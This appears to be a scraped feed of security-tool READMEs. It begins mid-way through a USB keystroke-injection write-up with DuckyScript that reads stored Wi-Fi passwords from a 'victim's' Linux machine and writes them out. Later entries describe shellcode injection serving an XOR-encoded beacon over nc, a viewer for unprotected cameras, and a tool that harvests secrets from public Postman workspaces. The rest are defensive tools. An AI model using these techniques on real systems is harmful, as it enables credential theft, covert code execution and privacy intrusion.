    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

    NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

    For more information about NetworkManager here is some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

    One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

    Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

    When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

    • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

    • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

    • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    Pantheon - Insecure Camera Parser

    By: Zion3R


    Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

    Functionalities

    Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


    Installation

    1. git clone https://github.com/josh0xA/Pantheon.git
    2. cd Pantheon
    3. pip3 install -r requirements.txt
      Execution: python3 pantheon.py
    • Note: I will later add a GUI installer to make it fully indepenent of a CLI

    Windows

    • You can just follow the steps above or download the official package here.
    • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

    Ubuntu

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/ubuntu_install.sh
    • ./distros/ubuntu_install.sh

    Debian and Kali Linux

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/debian-kali_install.sh
    • ./distros/debian-kali_install.sh

    MacOS

    • The regular installation steps above should suffice. If not, open up an issue.

    Usage

    (Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

    (Left-click) on a selected IP:Port to view the geolocation of the camera.
    (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

    Adjust the map as you please to see the markers.

    • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

    Ethical Notice

    The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

    Licence

    MIT License
    Copyright (c) Josh Schiavone



    ProcessStomping - A Variation Of ProcessOverwriting To Execute Shellcode On An Executable'S Section

    By: Zion3R


    A variation of ProcessOverwriting to execute shellcode on an executable's section

    What is it

    For a more detailed explanation you can read my blog post

    Process Stomping, is a variation of hasherezade’s Process Overwriting and it has the advantage of writing a shellcode payload on a targeted section instead of writing a whole PE payload over the hosting process address space.

    These are the main steps of the ProcessStomping technique:

    1. CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the processes primary thread.
    2. WriteProcessMemory - used to write each malicious shellcode to the target process section.
    3. SetThreadContext - used to point the entrypoint to a new code section that it has written.
    4. ResumeThread - self-explanatory.

    As an example application of the technique, the PoC can be used with sRDI to load a beacon dll over an executable RWX section. The following picture describes the steps involved.


    Disclaimer

    All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

    Credits

    This work has been made possible because of the knowledge and tools shared by Aleksandra Doniec @hasherezade and Nick Landers.

    Usage

    Select your target process and modify global variables accordingly in ProcessStomping.cpp.

    Compile the sRDI project making sure that the offset is enough to jump over your generated sRDI shellcode blob and then update the sRDI tools:

    cd \sRDI-master

    python .\lib\Python\EncodeBlobs.py .\

    Generate a Reflective-Loaderless dll payload of your choice and then generate sRDI shellcode blob:

    python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

    The shellcode blob can then be xored with a key-word and downloaded using a simple socket

    python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

    Deliver the xored blob upon connection

    nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

    The sRDI blob will get erased after execution to remove unneeded artifacts.

    Caveats

    To successfully execute this technique you should select the right target process and use a dll payload that doesn't come with a User Defined Reflective loader.

    Detection opportunities

    Process Stomping technique requires starting the target process in a suspended state, changing the thread's entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.



    PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

    By: Zion3R


    A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

    The tool was published as part of a research about Docker named pipes:
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

    Overview

    PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


    Usage

    Double-click the EXE binary and you will get the list of all named pipes.

    Build

    We used Visual Studio to compile it.
    When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:

    Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

    Warning

    We built the project and uploaded it so you can find it in the releases.
    One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjerManager package which is flagged as virus.
    Note that James Forshaw talked about it here.
    We can't change it because we depend on third-party DLL.

    Features

    • A detailed overview of named pipes.
    • Filter\highlight rows based on cells.
    • Bold specific rows.
    • Export\Import to\from JSON.
    • PipeChat - create a connection with available named pipes.

    Demo

    PipeViewer3_v1.0.mp4

    Credit

    We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

    License

    Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
    This repository is licensed under Apache-2.0 License - see LICENSE for more details.

    References

    For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



    APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

    By: Zion3R


    APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


    Features

    • Flexible Input: Accepts a single domain or a list of subdomains from a file.
    • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
    • Concurrency: Utilizes multi-threading for faster scanning.
    • Customizable Output: Save results to a file or print to stdout.
    • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
    • Custom User-Agent: Ability to specify a custom User-Agent for requests.
    • Smart Detection of False-Positives: Ability to detect most false-positives.

    Getting Started

    Prerequisites

    Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

    Installation

    Clone the APIDetector repository to your local machine using:

    git clone https://github.com/brinhosa/apidetector.git
    cd apidetector
    pip install requests

    Usage

    Run APIDetector using the command line. Here are some usage examples:

    • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

      python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
    • To scan a single domain:

      python apidetector.py -d example.com
    • To scan multiple domains from a file:

      python apidetector.py -i input_file.txt
    • To specify an output file:

      python apidetector.py -i input_file.txt -o output_file.txt
    • To use a specific number of threads:

      python apidetector.py -i input_file.txt -t 20
    • To scan with both HTTP and HTTPS protocols:

      python apidetector.py -m -d example.com
    • To run the script in quiet mode (suppress verbose output):

      python apidetector.py -q -d example.com
    • To run the script with a custom user-agent:

      python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

    Options

    • -d, --domain: Single domain to test.
    • -i, --input: Input file containing subdomains to test.
    • -o, --output: Output file to write valid URLs to.
    • -t, --threads: Number of threads to use for scanning (default is 10).
    • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
    • -q, --quiet: Disable verbose output (default mode is verbose).
    • -ua, --user-agent: Custom User-Agent string for requests.

    RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

    Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list based on potential risk levels, with similar endpoints grouped together APIDetector scans:

    1. High-Risk Endpoints (Direct API Documentation):

    • Endpoints:
      • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
    • Risk:
      • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
      • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

    2. Medium-High Risk Endpoints (API Schema/Specification):

    • Endpoints:
      • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
    • Risk:
      • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
      • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

    3. Medium Risk Endpoints (API Documentation Versions):

    • Endpoints:
      • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
    • Risk:
      • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
      • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

    4. Lower Risk Endpoints (Configuration and Resources):

    • Endpoints:
      • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
    • Risk:
      • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
      • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

    Summary:

    • Highest Risk: Directly exposing interactive API documentation interfaces.
    • Medium-High Risk: Exposing raw API schema/specification files.
    • Medium Risk: Version-specific API documentation.
    • Lower Risk: Configuration and resource files for API documentation.

    Recommendations:

    • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
    • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
    • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

    Contributing

    Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

    Legal Disclaimer

    The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

    License

    This project is licensed under the MIT License.

    Acknowledgments



    Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

    By: Zion3R


    py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.


    Installation

    • Via pip

      pip install pyamsi
    • Clone repository

      git clone https://github.com/Tomiwa-Ot/py-amsi.git
      cd py-amsi/
      python setup.py install

    Usage

    dictionary of the format # { # 'Sample Size' : 68, // The string/file size in bytes # 'Risk Level' : 0, // The risk level as suggested by the antivirus # 'Message' : 'File is clean' // Response message # }" dir="auto">
    from pyamsi import Amsi

    # Scan a file
    Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

    # Scan string
    Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

    # Both functions return a dictionary of the format
    # {
    # 'Sample Size' : 68, // The string/file size in bytes
    # 'Risk Level' : 0, // The risk level as suggested by the antivirus
    # 'Message' : 'File is clean' // Response message
    # }
    Risk Level Meaning
    0 AMSI_RESULT_CLEAN (File is clean)
    1 AMSI_RESULT_NOT_DETECTED (No threat detected)
    16384 AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
    20479 AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
    32768 AMSI_RESULT_DETECTED (File is considered malware)

    Docs

    https://tomiwa-ot.github.io/py-amsi/index.html



    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


    Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

    The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

    p = porchpirate()
    print(p.search('coca-cola.com'))

    Get Workspace Collections

    p = porchpirate()
    print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

    p = porchpirate()
    collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
    for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
    request_data = p.request(r['id'])
    print(request_data)

    Grabbing a Workspace's Globals

    p = porchpirate()
    print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    SecuSphere - Efficient DevSecOps

    By: Zion3R


    SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


    Centralized Vulnerability Management

    At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

    Seamless CI/CD Pipeline Integration

    SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

    Comprehensive Security Assessment

    SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

    Cultivating DevSecOps Practices

    SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

    Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

     Features

    • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
    • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
    • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
    • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

    Dashboard and Reporting

    SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

    API and Web Console

    SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

    For more information please refer to our Official Rest API Documentation

    Integration with Ticketing Systems

    SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

    Security Training and Awareness

    SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

    User Guide

    Get started with SecuSphere using our comprehensive user guide.

     Installation

    You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

    Clone the Repository

    $ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

    Setup

    Local Setup

    Navigate to the source directory and run the Python file:

    $ cd src/
    $ python run.py

    Dockerfile Setup

    Build and run the Dockerfile in the cicd directory:

    $ # From repository root
    $ docker build -t secusphere:latest .
    $ docker run secusphere:latest

    Docker Compose

    Use Docker Compose in the ci_cd/iac/ directory:

    $ cd ci_cd/iac/
    $ docker-compose -f secusphere.yml up

    Pull from Docker Hub

    Pull the latest version of SecuSphere from Docker Hub and run it:

    $ docker pull securityuniversal/secusphere:latest
    $ docker run -p 8081:80 -d secusphere:latest

    Feedback and Support

    We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

    Contributing

    We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



    ILSpy - .NET Decompiler With Support For PDB Generation, ReadyToRun, Metadata (and More) - Cross-Platform!

    By: Zion3R


    ILSpy is the open-source .NET assembly browser and decompiler.

    Decompiler Frontends

    Aside from the WPF UI ILSpy (downloadable via Releases, see also plugins), the following other frontends are available:

    • Visual Studio 2022 ships with decompilation support for F12 enabled by default (using our engine v7.1).
    • In Visual Studio 2019, you have to manually enable F12 support. Go to Tools / Options / Text Editor / C# / Advanced and check "Enable navigation to decompiled source"
    • C# for Visual Studio Code ships with decompilation support as well. To enable, activate the setting "Enable Decompilation Support".
    • Our Visual Studio 2022 extension marketplace
    • Our Visual Studio 2017/2019 extension marketplace
    • Our Visual Studio Code Extension repository | marketplace
    • Our Linux/Mac/Windows ILSpy UI based on Avalonia - check out https://github.com/icsharpcode/AvaloniaILSpy
    • Our ICSharpCode.Decompiler NuGet for your own projects
    • Our dotnet tool for Linux/Mac/Windows - check out ILSpyCmd in this repository
    • Our Linux/Mac/Windows PowerShell cmdlets in this repository

    Features

    • Decompilation to C# (check out the language support status)
    • Whole-project decompilation
    • Search for types/methods/properties (learn about the options)
    • Hyperlink-based type/method/property navigation
    • Base/Derived types navigation, history
    • Assembly metadata explorer (feature walkthrough)
    • BAML to XAML decompiler
    • ReadyToRun binary support for .NET Core (see the tutorial)
    • Extensible via plugins
    • Additional features in DEBUG builds (for the devs)

    License

    ILSpy is distributed under the MIT License. Please see the About doc for details, as well as third party notices for included open-source libraries.

    How to build

    Windows:

    • Make sure PowerShell (at least version) 5.0 is installed.
    • Clone the ILSpy repository using git.
    • Execute git submodule update --init --recursive to download the ILSpy-Tests submodule (used by some test cases).
    • Install Visual Studio (documented version: 17.1). You can install the necessary components in one of 3 ways:
      • Follow Microsoft's instructions for importing a configuration, and import the .vsconfig file located at the root of the solution.
      • Alternatively, you can open the ILSpy solution (ILSpy.sln) and Visual Studio will prompt you to install the missing components.
      • Finally, you can manually install the necessary components via the Visual Studio Installer. The workloads/components are as follows:
        • Workload ".NET Desktop Development". This workload includes the .NET Framework 4.8 SDK and the .NET Framework 4.7.2 targeting pack, as well as the .NET 6.0 SDK and .NET 7.0 SDK (ILSpy.csproj targets .NET 6.0, but we have net472+net70 projects too). Note: The optional components of this workload are not required for ILSpy
        • Workload "Visual Studio extension development" (ILSpy.sln contains a VS extension project) Note: The optional components of this workload are not required for ILSpy
        • Individual Component "MSVC v143 - VS 2022 C++ x64/x86 build tools" (or similar)
          • The VC++ toolset is optional; if present it is used for editbin.exe to modify the stack size used by ILSpy.exe from 1MB to 16MB, because the decompiler makes heavy use of recursion, where small stack sizes lead to problems in very complex methods.
      • Open ILSpy.sln in Visual Studio.
        • NuGet package restore will automatically download further dependencies
        • Run project "ILSpy" for the ILSpy UI
        • Use the Visual Studio "Test Explorer" to see/run the tests
        • If you are only interested in a specific subset of ILSpy, you can also use
          • ILSpy.Wpf.slnf: for the ILSpy WPF frontend
          • ILSpy.XPlat.slnf: for the cross-platform CLI or PowerShell cmdlets
          • ILSpy.AddIn.slnf: for the Visual Studio plugin

    Note: Visual Studio includes a version of the .NET SDK that is managed by the Visual Studio installer - once you update, it may get upgraded too. Please note that ILSpy is only compatible with the .NET 6.0 SDK and Visual Studio will refuse to load some projects in the solution (and unit tests will fail). If this problem occurs, please manually install the .NET 6.0 SDK from here.

    Unix / Mac:

    • Make sure .NET 7.0 SDK is installed.
    • Make sure PowerShell is installed (formerly known as PowerShell Core)
    • Clone the repository using git.
    • Execute git submodule update --init --recursive to download the ILSpy-Tests submodule (used by some test cases).
    • Use dotnet build ILSpy.XPlat.slnf to build the non-Windows flavors of ILSpy (.NET Core Global Tool and PowerShell Core).

    How to contribute

    Current and past contributors.

    Privacy Policy for ILSpy

    ILSpy does not collect any personally identifiable information, nor does it send user files to 3rd party services. ILSpy does not use any APM (Application Performance Management) service to collect telemetry or metrics.



    Pinkerton - An JavaScript File Crawler And Secret Finder Developed In Python

    By: Zion3R


    ️️ Pinkerton is a Python tool created to crawl JavaScript files and search for secrets


    Installing / Getting started

    A quick guide of how to install and use Pinkerton.

    1. Clone the repository with: git clone https://github.com/oppsec/pinkerton.git
    2. Install the libraries with: pip3 install -r requirements.txt
    3. Run Pinkerton with: python3 main.py -u https://example.com

    Docker

    If you want to use pinkerton in a Docker container, follow this commands:

    1. Clone the repository - git clone https://github.com/oppsec/pinkerton.git
    2. Build the image - sudo docker build -t pinkerton:latest .
    3. Run container - sudo docker run pinkerton:latest



    Pre-requisites

    • Python 3 installed on your machine.
    • Install the libraries with pip3 install -r requirements.txt

    Features

    • Works with ProxyChains
    • Fast scan
    • Low RAM and CPU usage
    • Open-Source
    • Python ❤️

    To-Do

    • Add more secrets regex pattern
    • Improve JavaScript file extract function
    • Improve pattern match system
    • Add pass list file method

    Contributing

    A quick guide of how to contribute with the project.

    1. Create a fork from Pinkerton repository
    2. Clone the repository with git clone https://github.com/your/pinkerton.git
    3. Type cd pinkerton/
    4. Create a branch and make your changes
    5. Commit and make a git push
    6. Open a pull request


    Credits


    Warning

    • The developer is not responsible for any malicious use of this tool.


    Dynmx - Signature-based Detection Of Malware Features Based On Windows API Call Sequences

    By: Zion3R


